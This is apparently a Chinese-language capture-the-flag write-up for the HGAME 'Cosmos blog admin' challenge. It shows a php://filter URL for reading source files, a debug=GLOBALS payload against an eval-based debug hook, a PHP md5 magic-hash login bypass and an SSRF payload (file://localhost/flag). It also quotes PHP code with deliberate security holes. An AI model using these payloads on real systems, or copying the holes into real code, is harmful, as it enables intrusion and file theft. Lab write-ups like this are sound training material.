cosmos的博客后台

太艰难了 自己还是太菜了
首先打开环境 hint是flag在根目录下
所以尝试一下本地文件包含 但是发现Hacker get out!

再尝试一下用伪协议去读login.php

1
http://cosmos-admin.hgame.day-day.work/index.php?action=php://filter/read=convert.base64-encode/resource=login.php

再用base64转义一下 得到源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
<?php
include "config.php";
session_start();

//Only for debug
if (DEBUG_MODE){
if(isset($_GET['debug'])) {
$debug = $_GET['debug'];
if (!preg_match("/^[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*$/", $debug)) {
die("args error!");
}
eval("var_dump($$debug);");
}
}

if(isset($_SESSION['username'])) {
header("Location: admin.php");
exit();
}
else {
if (isset($_POST['username']) && isset($_POST['password'])) {
if ($admin_password == md5($_POST['password']) && $_POST['username'] === $admin_username){
$_SESSION['username'] = $_POST['username'];
header("Location: admin.php");
exit();
}
else {
echo "用户名或密码错误";
}
}
}
?>

<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="">
<meta name="author" content="">
<title>Cosmos的博客后台</title>
<link href="static/signin.css" rel="stylesheet">
<link href="static/sticky-footer.css" rel="stylesheet">
<link href="https://cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet">
</head>

<body>

<div class="container">
<form class="form-signin" method="post" action="login.php">
<h2 class="form-signin-heading">后台登陆</h2>
<input type="text" name="username" class="form-control" placeholder="用户名" required autofocus>
<input type="password" name="password" class="form-control" placeholder="密码" required>
<input class="btn btn-lg btn-primary btn-block" type="submit" value="Submit">
</form>
</div>
<footer class="footer">
<center>
<div class="container">
<p class="text-muted">Created by Annevi</p>
</div>
</center>
</footer>
</body>
</html>

关键代码:
1
2
3
4
5
6
7
8
9
10
//Only for debug
if (DEBUG_MODE){
if(isset($_GET['debug'])) {
$debug = $_GET['debug'];
if (!preg_match("/^[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*$/", $debug)) {
die("args error!");
}
eval("var_dump($$debug);");
}
}

构造payload:
1
http://cosmos-admin.hgame.day-day.work/login.php?debug=GLOBALS

使用GLOBALS显示全局变量
得到账号:Cosmos!
密码由于采用了!== 又是md5 而且是0exxxxx格式 所以利用PHP中md5的漏洞
https://blog.csdn.net/qq_19980431/article/details/83018232

随便用一个:QNKCDZO
成功登录到后台之后

再利用伪协议读取一下admin.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
function insert_img() {
if (isset($_POST['img_url'])) {
$img_url = @$_POST['img_url'];
$url_array = parse_url($img_url);
if (@$url_array['host'] !== "localhost" && $url_array['host'] !== "timgsa.baidu.com") {
return false;
}
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $img_url);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$res = curl_exec($c);
curl_close($c);
$avatar = base64_encode($res);

if(filter_var($img_url, FILTER_VALIDATE_URL)) {
return $avatar;
}
}
else {
return base64_encode(file_get_contents("static/logo.png"));
}
}

关键代码 利用SSRF构造payload

1
file://localhost/flag

复制图片的地址 解码后面的base64

得到flag